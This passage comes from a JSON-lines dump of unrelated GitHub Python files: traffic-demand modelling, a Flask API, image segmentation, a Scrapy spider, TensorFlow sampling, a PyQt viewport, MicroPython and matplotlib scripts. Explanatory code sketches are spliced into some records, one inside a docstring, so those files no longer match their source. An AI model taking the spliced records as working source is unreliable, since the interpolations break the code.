\"\"\"\n Return input time in minutes. 
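_getTimePeriods above walks from startTime to endTime in timeStep increments and records the *end* of each slice. A stdlib-only sketch of the same walk, substituting datetime for dta.Utils.Time (an illustrative substitution, Python 3):

# Hedged sketch of the time-slice walk in _getTimePeriods.
from datetime import datetime, timedelta

def get_time_periods(start, end, step):
    if (end - start) % step != timedelta(0):
        raise ValueError("Demand interval is not divisible by the time step")
    result, t = [], start
    while t != end:
        t += step
        result.append(t)  # each entry is the *end* of a slice
    return result

slices = get_time_periods(datetime(2012, 1, 1, 6, 0),
                          datetime(2012, 1, 1, 9, 0),
                          timedelta(minutes=30))
print([s.strftime("%H:%M") for s in slices])  # 06:30 ... 09:00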
Input time should be a datetime.datetime or \n datetime.timedelta object\n \"\"\"\n \n if isinstance(time, datetime.datetime):\n return time.hour * 60 + time.minute \n elif isinstance(time, datetime.timedelta):\n return time.seconds / 60 \n \n def setValue(self, timeLabel, origin, destination, value):\n \"\"\"\n Set the value of the given timeLabel, origin, and destination\n \"\"\"\n self._demandTable[timeLabel, origin, destination] = value \n \n def getValue(self, timeLabel, origin, destination):\n \"\"\"\n Return the value of the given time period, origin, and destination\n \"\"\"\n return self._demandTable[timeLabel, origin, destination]\n\n @classmethod\n def writeDynameqDemandHeader(cls, outputStream, startTime, endTime, vehClassName, format='full'):\n \"\"\"\n Write the demand header in the dynameq format\n .. todo:: implement linear writing\n \"\"\"\n \n if format != 'full':\n raise DtaError(\"Unimplemented Matrix Format specified: %s\" % (format))\n \n FORMAT_LINEAR = 'FORMAT:linear'\n FORMAT_FULL = 'FORMAT:full' \n HEADER_LINE1 = '*DEMAND MATRIX ASCII FILE [FULL FORMAT]- GENERATED'\n VEHCLASS_SECTION = 'VEH_CLASS'\n DEFAULT_VEHCLASS = 'Default'\n DATA_SECTION = 'DATA'\n \n\n outputStream.write(\"\\n\\n\\n\")\n outputStream.write('%s %s %s\\n' % (\"Created by python DTA by SFCTA\", \n datetime.datetime.now().strftime(\"%x\"), \n datetime.datetime.now().strftime(\"%X\")))\n if format == 'full':\n outputStream.write('%s\\n' % FORMAT_FULL)\n elif format == 'linear':\n outputStream.write('%s\\n' % FORMAT_LINEAR)\n else:\n raise DtaError(\"Don't understand Dynameq Output Matrix Format: %s\" % (format))\n \n outputStream.write('%s\\n' % VEHCLASS_SECTION)\n outputStream.write('%s\\n' % vehClassName)\n outputStream.write('%s\\n' % DATA_SECTION)\n outputStream.write(\"%s\\n%s\\n\" % (startTime.strftime(\"%H:%M\"),\n endTime.strftime(\"%H:%M\"))) \n\n def writeDynameqTable(self, outputStream, format='full'):\n \"\"\"\n Write the demand in Dynameq format\n .. todo:: implement linear writing\n \"\"\"\n \n if format != 'full':\n raise DtaError(\"Unimplemented Matrix Format specified: %s\" % (format))\n \n SLICE_SECTION = 'SLICE'\n \n timeStepInMin = self.timeStep.getMinutes()\n\n _npyArray = self._demandTable.getNumpyArray()\n \n for i, timePeriod in enumerate(self._timePeriods):\n outputStream.write(\"SLICE\\n%s\\n\" % timePeriod.strftime(\"%H:%M\"))\n outputStream.write(\"\\t%s\\n\" % '\\t'.join(map(str, self._centroidIds)))\n\n for j, cent in enumerate(self._centroidIds):\n outputStream.write(\"%d\\t%s\\n\" % (cent, \"\\t\".join(\"%.2f\" % elem for elem in _npyArray[i, j, :]))) \n \n\n\n def __eq__(self, other):\n \"\"\"\n Implementation of the == operator. The comparison of the \n two demand objects is made using both the data and the labels \n of the underlying multidimensional arrays. \n \"\"\" \n if self.startTime != other.startTime or self.endTime != other.endTime or \\\n self.timeStep != other.timeStep:\n return False \n\n if self._timePeriods != other._timePeriods or self._timeLabels != \\\n other._timeLabels or self._centroidIds != other._centroidIds:\n return False\n\n if self.vehClassName != other.vehClassName:\n return False\n\n if not self._demandTable == other._demandTable:\n return False \n\n return True\n\n def applyTimeOfDayFactors(self, factorsInAList):\n \"\"\"\n Apply the given time of day factors to the existing \n demand object and return a new demand object with as many \n time slices as the number of factors. 
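applyTimeOfDayFactors splits one slice into as many slices as there are factors, which must sum to 1; because the table stores hourly flow rates and each new slice is len(factors) times shorter, the rate in slice k becomes factors[k] * len(factors) * rate. A small sketch of that check-and-scale arithmetic with illustrative values:

# Sketch of the factor validation and per-slice scaling.
factors = [0.2, 0.3, 0.5]          # must sum to 1.0
if abs(sum(factors) - 1.0) > 1e-7:
    raise ValueError("time-of-day factors should sum to 1.0: %s" % factors)

hourly_flow = 120.0                 # one O-D value from the single input slice
new_flows = [f * len(factors) * hourly_flow for f in factors]
print(new_flows)                    # [72.0, 108.0, 180.0]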
Each time slice is \n the result of the original table multiplied by a factor \n in the list. \n \"\"\"\n #raise Exception(\"This is not the correct implementation. Change it\") \n if self.getNumSlices() != 1:\n raise DtaError(\"Time of day factors can be applied only to a demand that has only\"\n \" one time slice\")\n for i in range(0,len(factorsInAList)):\n factorsInAList[i] = float(factorsInAList[i])\n \n if abs(sum(factorsInAList) - 1.) > 0.0000001:\n raise DtaError(\"The input time of day factors should sum up to 1.0. Factors are %s\" % factorsInAList) \n \n newTimeStepInMin = self.timeStep.getMinutes() / len(factorsInAList)\n newTimeStep = Time.fromMinutes(newTimeStepInMin)\n \n newDemand = Demand(self._net, self.vehClassName, self.startTime, self.endTime, newTimeStep)\n #timeSpan = (newDemand.endTime - newDemand.startTime).getMinutes()/60.0\n oldDemand = 0\n sliceDemand = []\n for k, timeSlice in enumerate(newDemand._timePeriods):\n sliceDemand.append(0)\n for origin in self._centroidIds:\n for destination in self._centroidIds:\n tripsOD_Old = self.getValue(self.endTime, origin, destination)*len(factorsInAList)\n for k, timeSlice in enumerate(newDemand._timePeriods):\n tripsOD = factorsInAList[k]*tripsOD_Old\n newDemand.setValue(timeSlice, origin, destination, tripsOD)\n \n return newDemand \n\n def removeInvalidODPairs(self):\n \"\"\"\n Examine all the OD interchanges and remove those for which \n a path does not exist from origin to destination\n \"\"\"\n \n for originId in self._centroidIds:\n for destinationId in self._centroidIds:\n for timeLabel in self._timeLabels:\n if self.getValue(timeLabel, originId, destinationId) > 0:\n origin = self._net.getNodeForId(originId)\n destination = self._net.getNodeForId(destinationId)\n if not hasPath(self._net, origin, destination):\n self.setValue(timeLabel, originId, destinationId, 0) \n \n def getTotalNumTrips(self):\n \"\"\"\n Return the total number of trips for all time periods\n \"\"\"\n return self._demandTable.getSum() * self.timeStep.getMinutes() / 60.0\n\n\n","repo_name":"sfcta/dta","sub_path":"dta/Demand.py","file_name":"Demand.py","file_ext":"py","file_size_in_byte":17944,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72518393388","text":"from Products.CMFCore.permissions import setDefaultRoles\n\n## The Project Name\nPROJECTNAME = \"salesforcepfgadapter\"\n\n## The skins dir\nSKINS_DIR = 'skins'\n\n## Globals variable\nGLOBALS = globals()\n\n## Permission for creating a SalesforcePFGAdapter\nSFA_ADD_CONTENT_PERMISSION = 'PloneFormGen: Add Salesforce PFG Adapter'\nsetDefaultRoles(SFA_ADD_CONTENT_PERMISSION, ('Manager','Owner',))\n\n## Required field marker\nREQUIRED_MARKER = \"(required)\"\n\nSF_ADAPTER_TYPES = ['SalesforcePFGAdapter',]\n\nREQUEST_KEY = '_sfpfg_adapter'\nSESSION_KEY = '_pfgadapter_session'","repo_name":"collective/Products.salesforcepfgadapter","sub_path":"Products/salesforcepfgadapter/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29958955905","text":"import os\nfrom pathlib import Path\nfrom flasgger import swag_from\nfrom flask import jsonify, request, current_app\nfrom flask_restful import Resource, abort, Api\nfrom xml.etree import ElementTree\n\nfrom models.race_model import Race, Driver, Company\nimport app.api.config as yaml_config\n\nPATH_TO_YAML_CONFIG = 
os.path.join(Path(yaml_config.__file__).parent.absolute(), 'reports_race.yml')\n\n\nclass RaceReport(Resource):\n \"\"\"Race report API\"\"\"\n def __init__(self):\n self.order = request.args.get('order')\n self.format_type = request.args.get('format')\n self.check_order()\n self.order = True if self.order == 'desc' else False\n self.check_format()\n self.race_table = None\n\n @swag_from(PATH_TO_YAML_CONFIG)\n def get(self):\n \"\"\"Handle get request\"\"\"\n race_table_rows = (\n Race.select(Race.place, Driver.name.alias('driver'), Company.name.alias('company'), Race.time)\n .join(Driver, on=(Race.driver == Driver.id))\n .join(Company, on=(Race.company == Company.id))\n .dicts())\n self.race_table = sorted(race_table_rows, key=lambda race: race['place'], reverse=self.order)\n\n if self.format_type == 'json':\n response = jsonify(self.race_table)\n else:\n response = self.prepare_report_to_xml_convert()\n return response\n\n def check_order(self):\n \"\"\"Check order asc, desc\"\"\"\n if not self.order:\n self.order = 'asc'\n if self.order not in ['asc', 'desc']:\n abort(404)\n\n def check_format(self):\n \"\"\"Check format json, xml\"\"\"\n if not self.format_type:\n self.format_type = 'json'\n if self.format_type not in ['json', 'xml']:\n abort(404)\n\n def prepare_report_to_xml_convert(self):\n \"\"\"Prepare race report to xml convert\"\"\"\n root = ElementTree.Element('Races')\n for race in self.race_table:\n title = ElementTree.Element('Race')\n root.append(title)\n place = ElementTree.SubElement(title, 'Place')\n place.text = str(race['place'])\n driver = ElementTree.SubElement(title, 'Driver')\n driver.text = race['driver']\n company = ElementTree.SubElement(title, 'Company')\n company.text = race['company']\n time = ElementTree.SubElement(title, 'Time')\n time.text = race['time']\n tree = ElementTree.ElementTree(root)\n ElementTree.indent(tree, ' ')\n return current_app.response_class(ElementTree.tostring(root), mimetype='application/xml')\n\n\ndef init_api(app):\n api = Api(app)\n api.add_resource(RaceReport, '/api/v1/report/')\n","repo_name":"wspr/herries-press","sub_path":"app/api/reports_race.py","file_name":"reports_race.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"7327531387","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'}\nimport numpy as np\nimport pandas as pd\nfrom statistics import mean\nimport cv2\nimport warnings\nimport tensorflow\nfrom tqdm import tqdm\nfrom tensorflow.keras.callbacks import *\nfrom color_norm import patch_join\nfrom dataset import DataGeneratorFolder,aug_with_crop\nfrom scores_comp import iou_metric,dice_metric\nfrom model import create_model\nwarnings.filterwarnings('ignore')\n# Path for the stain normalized image patches normalized image\ntest_data_path = '/content/TestData/'\n# Path to the full sized test mask for score computation\ngt_path = '/content/drive/MyDrive/intern_pyth/monuseg/TestData/Bin/'\n# Path to model weight and weight name\nmodel_path = '/content/drive/MyDrive/weights'\nweight_name = 'weight_kumar_dataset.h5'\n# Path to save the segmented masks\nif not os.path.exists(\"/content/results\"):\n os.mkdir(\"/content/results\")\nsv_path = '/content/results'\n\n# used height and widht for patch\nimg_width_p = 256\nimg_height_p = 256\n# Full image size\nimg_width_f = 1000\nimg_height_f = 1000\n\ntest_generator = DataGeneratorFolder(root_dir = test_data_path, \n image_folder = 'tis/', \n 
mask_folder = 'Bin/', \n batch_size=1,augmentation = None,\n image_size=img_width_p,\n nb_y_features = 1)\n\n\nmodel = create_model()\nmodel.load_weights(os.path.join(model_path,weight_name))\n\nout_im = []\n\nprint('Predicting the masks ===========>')\nfor tes in tqdm(range(len(test_generator)),total=len(test_generator)):\n Xtest_n, y_test_n = test_generator.__getitem__(tes)\n predicted = model.predict(np.expand_dims(Xtest_n[0], axis=0)).reshape(img_width_p, img_height_p)\n predicted1= predicted.flatten()\n predicted1[predicted1>=0.5]=1\n predicted1[predicted1<0.5]=0\n predicted2 = predicted1.reshape((img_width_p, img_height_p))\n predicted2 = np.expand_dims(predicted2, -1)\n out_im.append(predicted2)\n\n# Creating full sized segmented image (actual size) from segmented patches\nprint('Joining the segmented patches to original sized masks ===========>')\nout_full,ids_test = patch_join(out_im)\n\n# Writing the masks as image filee to folder\nprint('Writing segmented masks to image files ===========>')\nfor n, id_ in tqdm(enumerate(ids_test), total=len(ids_test)):\n\n imgs = np.reshape(out_full[n]*255,(img_width_f,img_height_f))\n filename = '{}/{}.png'.format(sv_path,os.path.splitext(id_)[0])\n cv2.imwrite(filename, imgs)\n\nprint('Segmented images are saved in {}'.format(sv_path))\n\n# Computing scores (DICE and IOU)\nprint('Scores for the segmented output ===========>')\nscr_met = {'IOU':[],'DICE':[]}\n\nfor _,i in enumerate(ids_test):\n \n gt = gt_path+os.path.splitext(i)[0]+'.png'\n plabel = os.path.join(sv_path,os.path.splitext(i)[0]+'.png')\n\n true = cv2.imread(gt,0).astype(np.bool)\n pred_1 = cv2.imread(plabel,0).astype(np.bool)\n\n dice_coeff = dice_metric(true,pred_1)\n jacc_f = iou_metric(true,pred_1)\n\n scr_met['IOU'].append(jacc_f.item())\n scr_met['DICE'].append(dice_coeff.item())\n print('ID-{} IOU: {:.3}, DICE: {:.3}'.format(os.path.splitext(id_)[0],jacc_f.item(),dice_coeff.item()))\n\n\nprint(\"mean of jaccard: \",mean(scr_met['IOU']))\nprint(\"mean of dice: \",mean(scr_met['DICE']))\n ","repo_name":"shyamfec/NucleiSegNet","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"40437103015","text":"import scrapy\r\nfrom scrapy.http import Request # Add this line to import Request\r\nfrom scrapy.selector import Selector\r\nfrom scrapy.http import FormRequest\r\nimport re\r\nfrom urllib.parse import urlparse\r\nimport pandas as pd\r\n\r\nclass RunningSpider(scrapy.Spider):\r\n name = \"drama\"\r\n \r\n custom_settings = {\r\n 'FEEDS': {\r\n 'items.csv': {\r\n 'format': 'csv',\r\n 'encoding': 'utf8',\r\n 'overwrite': True,\r\n #'fields': ['field1', 'field2', 'field3'], # Add your desired fields here\r\n },\r\n },\r\n }\r\n \r\n def start_requests(self):\r\n self.items_processed = 0 # Initialize the counter\r\n self.item_limit = 101 # Set the maximum number of items to process\r\n \r\n\r\n start_urls=['https://mydramalist.com/people/top']\r\n\r\n \r\n for url in start_urls:\r\n headers = {\r\n 'authority': 'mydramalist.com',\r\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',\r\n 'accept-language': 'en-US,en;q=0.9',\r\n 'referer': 'https://mydramalist.com/people/top',\r\n 'sec-ch-ua': '\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"',\r\n 'sec-ch-ua-mobile': '?0',\r\n 'sec-ch-ua-platform': '\"Linux\"',\r\n 
'sec-fetch-dest': 'document',\r\n 'sec-fetch-mode': 'navigate',\r\n 'sec-fetch-site': 'same-origin',\r\n 'sec-fetch-user': '?1',\r\n 'upgrade-insecure-requests': '1',\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',\r\n }\r\n \r\n \r\n\r\n yield scrapy.Request(url=url,callback=self.get_list,headers=headers)\r\n\r\n\r\n def get_list(self,response):\r\n\r\n\r\n headers = {\r\n 'authority': 'mydramalist.com',\r\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',\r\n 'accept-language': 'en-US,en;q=0.9',\r\n 'referer': 'https://mydramalist.com/people/top',\r\n 'sec-ch-ua': '\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\"',\r\n 'sec-ch-ua-mobile': '?0',\r\n 'sec-ch-ua-platform': '\"Linux\"',\r\n 'sec-fetch-dest': 'document',\r\n 'sec-fetch-mode': 'navigate',\r\n 'sec-fetch-site': 'same-origin',\r\n 'sec-fetch-user': '?1',\r\n 'upgrade-insecure-requests': '1',\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',\r\n }\r\n\r\n links=response.xpath('//h6/a/@href').extract()\r\n \r\n for link in links:\r\n link=\"https://mydramalist.com\"+link\r\n print(link)\r\n \r\n yield scrapy.Request(url=link,callback=self.get_category,headers=headers)\r\n\r\n np=response.xpath('//li[@class=\"page-item next\"]/a/@href').get()\r\n if np:\r\n np=\"https://mydramalist.com\"+np\r\n yield scrapy.Request(url=np,callback=self.get_list,headers=headers)\r\n\r\n\r\n def get_category(self,response):\r\n\r\n name=response.xpath('//h1[@class=\"film-title m-b-0 m-r-0\"]/text()').get()\r\n item={}\r\n item['name']=name\r\n i=0\r\n td_elements = response.xpath('//table[@class=\"table film-list\"]//tr').getall()\r\n\r\n data = Selector(text=td_elements[1])\r\n td_elements = data.xpath('.//td//text()').getall()\r\n for data in td_elements:\r\n i=str(i)\r\n data=data.split('\\n')[0]\r\n if data:\r\n # print(data)\r\n \r\n item[i]=data\r\n i=int(i)\r\n i=i+1\r\n if self.items_processed >= self.item_limit:\r\n self.crawler.engine.close_spider(self, 'Reached item limit')\r\n\r\n self.items_processed += 1\r\n yield item\r\n\r\n def close_spider(self, reason):\r\n pass\r\n","repo_name":"mugil1724/webscrappin_retake","sub_path":"drama_scrapy/drama_scrapy/spiders/drama_spider.py","file_name":"drama_spider.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40311323995","text":"import io\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport sys\ndef plot_to_image(figure, add_dim = True):\n \"\"\"\n Converts the matplotlib plot specified by 'figure' to a PNG image and\n returns it. The supplied figure is closed and inaccessible after this call.\n \"\"\"\n \n buf = io.BytesIO()\n \n # Use plt.savefig to save the plot to a PNG in memory.\n plt.savefig(buf, format='png')\n \n # Closing the figure prevents it from being displayed directly inside\n # the notebook.\n plt.close(figure)\n buf.seek(0)\n \n # Use tf.image.decode_png to convert the PNG buffer\n # to a TF image. 
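plot_to_image above returns a [1, H, W, 4] tensor precisely so it can be fed to TensorBoard image summaries. A minimal usage sketch, assuming the plot_to_image helper defined above is in scope and TF 2.x eager mode; the log directory is a placeholder:

# Hedged usage sketch: logging a matplotlib figure via plot_to_image.
import matplotlib.pyplot as plt
import tensorflow as tf

fig = plt.figure()
plt.plot([0, 1, 2], [0, 1, 4])

image = plot_to_image(fig)  # [1, H, W, 4] because add_dim=True by default

writer = tf.summary.create_file_writer("/tmp/logs")  # placeholder path
with writer.as_default():
    tf.summary.image("training_curve", image, step=0)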
Make sure you use 4 channels.\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n \n if(add_dim):\n # Use tf.expand_dims to add the batch dimension\n image = tf.expand_dims(image, 0)\n \n return image\n\n# https://github.com/tensorflow/tensorflow/issues/14451\n# if equal to 0 then oversample_classes() always returns 1\ndef oversample_classes(label, label_probs, label_target_probs, oversampling_coef = 0.2):\n \"\"\"\n Returns the number of copies of given example\n \"\"\"\n print(label)\n label = tf.math.argmax(label, axis= -1, output_type=tf.dtypes.int32)\n label_prob = label_probs.lookup(label)\n label_target_prob = label_target_probs.lookup(label)\n \n prob_ratio = tf.cast(label_target_prob/label_prob, dtype=tf.float32)\n # soften ratio is oversampling_coef==0 we recover original distribution\n prob_ratio = prob_ratio ** oversampling_coef \n # for classes with probability higher than class_target_prob we\n # want to return 1\n prob_ratio = tf.math.maximum(prob_ratio, 1) \n # for low probability classes this number will be very large\n repeat_count = tf.math.floor(prob_ratio)\n # prob_ratio can be e.g 1.9 which means that there is still 90%\n # of change that we should return 2 instead of 1\n repeat_residual = prob_ratio - repeat_count # a number between 0-1\n residual_acceptance = tf.math.less_equal(\n tf.random.uniform([], dtype=tf.float32), repeat_residual\n )\n\n residual_acceptance = tf.cast(residual_acceptance, tf.int64)\n repeat_count = tf.cast(repeat_count, dtype=tf.int64)\n \n return tf.reshape(repeat_count + residual_acceptance, []) #convert tensor to scalar tensor\n\n\n# undersampling coef if equal to 0 then oversampling_filter() always returns True\ndef undersampling_filter(value, label, label_probs, label_target_probs,undersampling_coef = 0.8):\n \"\"\"\n Computes if given example is rejected or not.\n \"\"\"\n print(label)\n\n newlabel = tf.math.argmax(label, axis= -1, output_type=tf.dtypes.int32)\n label_prob = label_probs.lookup(newlabel)\n label_target_prob = label_target_probs.lookup(newlabel)\n prob_ratio = tf.cast(label_target_prob/label_prob, dtype=tf.float32)\n prob_ratio = prob_ratio ** undersampling_coef\n prob_ratio = tf.math.minimum(prob_ratio, 1.0)\n \n #return tf.cond(tf.random.uniform([], dtype=tf.float32) <= prob_ratio, lambda: tf.data.Dataset.from_tensors((value, label)), lambda: tf.data.Dataset())\n return tf.reshape(tf.math.less_equal(tf.random.uniform([], dtype=tf.float32), prob_ratio), [])\n\n \n\n","repo_name":"veikkahonkanen/ML-Seizurenet","sub_path":"tensorflow_utils.py","file_name":"tensorflow_utils.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24457069248","text":"'''Viewport object, used to draw objects into user interface'''\nfrom typing import List\n\nfrom PyQt5 import QtWidgets, QtGui\n#from PyQt5.QtWidgets import (QColorDialog)\nfrom PyQt5.QtGui import QColor\n\nfrom src.model.objects import ViewportObjectRepresentation\n\n\nclass ViewPort(QtWidgets.QLabel):\n \"\"\"\n Class to be the drawing area of application viewport\n \"\"\"\n\n def __init__(self, parent):\n super().__init__(parent)\n\n # Object style sheet\n stylesheet = '''\n QLabel {\n background-color: white;\n border: 1px solid black\n }\n '''\n self.setStyleSheet(stylesheet)\n\n # Varaible to hold objects to be drawn\n self.objects: List[ViewportObjectRepresentation] = []\n\n def draw_objects(self, objects: List[ViewportObjectRepresentation]):\n \"\"\"\n Redraw view, 
checking if objects are inside the viewport\n\n Parameters\n ----------\n objects: List[ViewportObjectRepresentation]\n List of objects to be draw\n \"\"\"\n\n self.objects = objects\n self.update()\n\n def paintEvent(self, _event: QtGui.QPaintEvent):\n '''Reimplementing paint event function, that is called by update'''\n\n painter = QtGui.QPainter()\n painter.begin(self)\n pen = QtGui.QPen()\n for obj in self.objects:\n # Get specific attributes\n pen.setWidth(obj.thickness)\n pen.setColor(obj.color)\n painter.setPen(pen)\n\n # In case it is a point\n if len(obj.points) == 1:\n point = obj.points[0]\n painter.drawPoint(point.x, point.y)\n\n # In case it is a line\n elif len(obj.points) == 2:\n init_p, end_p = obj.points\n painter.drawLine(init_p.x, init_p.y,\n end_p.x, end_p.y)\n\n # In case it is a wireframe\n else:\n init_p = obj.points[0]\n prev_p = init_p\n for current_p in obj.points[1:]:\n painter.drawLine(prev_p.x, prev_p.y,\n current_p.x, current_p.y)\n prev_p = current_p\n\n last_p = obj.points[-1]\n painter.drawLine(last_p.x, last_p.y,\n init_p.x, init_p.y)\n\n # drawing the view port border\n pen.setWidth(2)\n pen.setColor(QColor(255, 0, 0))\n painter.setPen(pen)\n\n painter.drawLine(10, 10, 590, 10)\n painter.drawLine(10, 10, 10, 590)\n painter.drawLine(10, 590, 590, 590)\n painter.drawLine(590, 10, 590, 590)\n\n painter.end()\n","repo_name":"shthiago/INE5420","sub_path":"src/view/viewport.py","file_name":"viewport.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71222967787","text":"def calcula_dobro(numero):\n\ttotal = numero * 2\n\treturn total\n\na = calcula_dobro(8)\nprint(a)\n\n\n# As an array as a parameter\ndef calcula_soma_numeros(*numeros):\n\ttotal = 0\n\tfor numero in numeros:\n\t\ttotal += numero\n\treturn total\n\t# or just return sum(numeros) \n\nsoma = calcula_soma_numeros(2,3,4,6)\nprint(\"O resultado da soma e \", soma)\n\n\n# As an array as a parameter with 2 dimensions\ndef calcula_soma_numeros2(num1, num2,**numeros):\n\tresultado = 0\n\tfor item in numeros:\n\t\tresultado =+ numeros[item]\n\treturn resultado \n\t# Or Return sum(numeros.values())\n\nsoma2 = calcula_soma_numeros2(num1=5, num2=10, num3=20)\nprint(\"O resultado da soma da funcao2 e \", soma2)","repo_name":"felipeDS91/udemy-curso-web","sub_path":"python/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3483271126","text":"from machine import Pin, I2C\nimport dht\nimport ssd1306\nimport time\n\nsens=dht.DHT11(Pin(12))\ni2c=I2C(sda=Pin(4),scl=Pin(5))\ndisplay=ssd1306.SSD1306_I2C(128,64,i2c)\n\n\nwhile True:\n display.fill(0)\n sens.measure()\n display.text(\"Weather Station\",0,0,1)\n display.text(\"Celsius: \"+str(sens.temperature())+\"C\",0,28,1)\n display.text(\"Humidity: \"+str(sens.humidity())+\"%RH\",0,55,1)\n display.show()\n time.sleep(0.01)\n","repo_name":"Aesgiyr/esp8266-microPython","sub_path":"weatherStation/weatherStation.py","file_name":"weatherStation.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73035147306","text":"import matplotlib.pyplot as pl\nimport matplotlib.animation as an\n\nimport random\nimport string\n\nclass Animation(object):\n \"\"\"\n An object representing the visual animation and offering methods to handle\n 
most of the animation code.\n \"\"\"\n\n def __init__(self, particles, frame_callback, scale):\n \"\"\"\n Arguments:\n particles: the list of Particle objects to display on the \n animation.\n frame_callback: the function to call after drawing each new frame.\n scale: half the side length of the animation window (which is \n square).\n \"\"\"\n \n self._particles = particles\n self._frame_callback = frame_callback\n self._scale = scale\n\n self._frame = 0\n\n self._patches = map(make_patch, self._particles)\n \n def _init_animation(self):\n \"\"\"\n Initialise the animation by creating the figures and scaling the axes.\n \n Returns: the list of patches.\n \"\"\"\n \n self._main_figure.gca().axis(\n [-self._scale, self._scale, -self._scale, self._scale])\n \n self._main_figure.gca().autoscale(False)\n\n for patch in self._patches:\n self._main_figure.gca().add_artist(patch)\n\n return self._patches\n\n def _next_step(self, frame):\n \"\"\"\n Update the patches to produce the next animation frame.\n \n Arguments:\n frame: an int representing the current frame.\n \n Returns: the list of patches.\n \"\"\"\n \n # Calculate the next simulation step.\n self._frame_callback(self)\n\n for particle, patch in zip(self._particles, self._patches):\n patch.center = particle.get_current_position()\n\n self._frame += 1\n\n return self._patches\n\n def get_current_frame_number(self):\n \"\"\"\n Get the integer number of frames elapsed so far.\n \n Returns: the current frame number as an int.\n \"\"\"\n \n return self._frame\n\n def get_pyplot_animation(self):\n \"\"\"\n Get the matplotlib FuncAnimation object that is dealing with the\n animation.\n \n Returns: the matplotlib FuncAnimation object responsible for the\n animation.\n \"\"\"\n \n return self._sim_animation\n \n def start(self, block=True, interval=10, size=(10, 10)):\n \"\"\"\n Begin the animation.\n \n Arguments:\n block: whether to stop anything else executing (other than the \n callback function) while the animation runs.\n interval: the time (in milliseconds) between frames.\n size: the size of the plot (in inches, because matplotlib takes\n inches by default), as a tuple.\n \"\"\"\n \n self._main_figure = pl.figure(\"Animation\", figsize=size)\n\n # We have to assign a variable to this animation or the garbage\n # collector will throw it out and nothing will work.\n self._sim_animation = an.FuncAnimation(\n self._main_figure,\n self._next_step,\n interval=interval,\n blit=True,\n init_func=self._init_animation\n )\n\n pl.show(block)\n \ndef make_patch(particle):\n \"\"\"\n Create a patch for a particle.\n \n Arguments:\n particle: a Particle object.\n \n Returns: a Circle patch representing the particle, or a projection of\n the particle onto the xy plane.\n \"\"\"\n\n if particle.is_immovable():\n return pl.Circle(\n particle.get_current_position(),\n particle.get_radius(),\n fill=False\n )\n else:\n if particle.get_colour() is not None:\n fill_colour = particle.get_colour()\n else:\n # Generate random colour.\n fill_colour = \"#\" + string.zfill(\n hex(random.randrange(0, 16777215))[2:], 6)\n\n return pl.Circle(\n particle.get_current_position(),\n particle.get_radius(),\n color=fill_colour)","repo_name":"David-Hickey/thermodynamics-snookered","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37798444515","text":"numToEnter=input(\"Type a number: 
\")\nnumList=[]\nnumAmnt=0\nhasAlerted=False\nwhile numToEnter != '' or numAmnt<2:\n if numToEnter.isnumeric()==True:\n numList.append(int(numToEnter))\n numAmnt+=1\n if numAmnt>1 and hasAlerted==False:\n print(\"You have enough numbers, but feel free to add another(ENTER to stop)\")\n hasAlerted=True\n numToEnter=input(\"Type a number: \")\nprint(str(numList))\nnumList.sort()\nprint(str(numList))\nnumList.sort(reverse=True)\nprint(str(numList))\n","repo_name":"zachshah/PythonChallenges2","sub_path":"Challenge4.py","file_name":"Challenge4.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8011122161","text":"#!/usr/bin/python3\n\"\"\"Script takes in a URL, sends a request to the URL\nand displays the value of the X-Request-Id variable found in the header\n\"\"\"\nimport sys\nimport urllib.request\n\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n resp = urllib.request.Request(url)\n with urllib.request.urlopen(resp) as holder:\n print(dict(holder.headers).get('X-Request-Id'))\n","repo_name":"Dessira/alx-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41096077857","text":"# coding: utf-8\n\n\"\"\"\n Moira Alert\n\n This is an 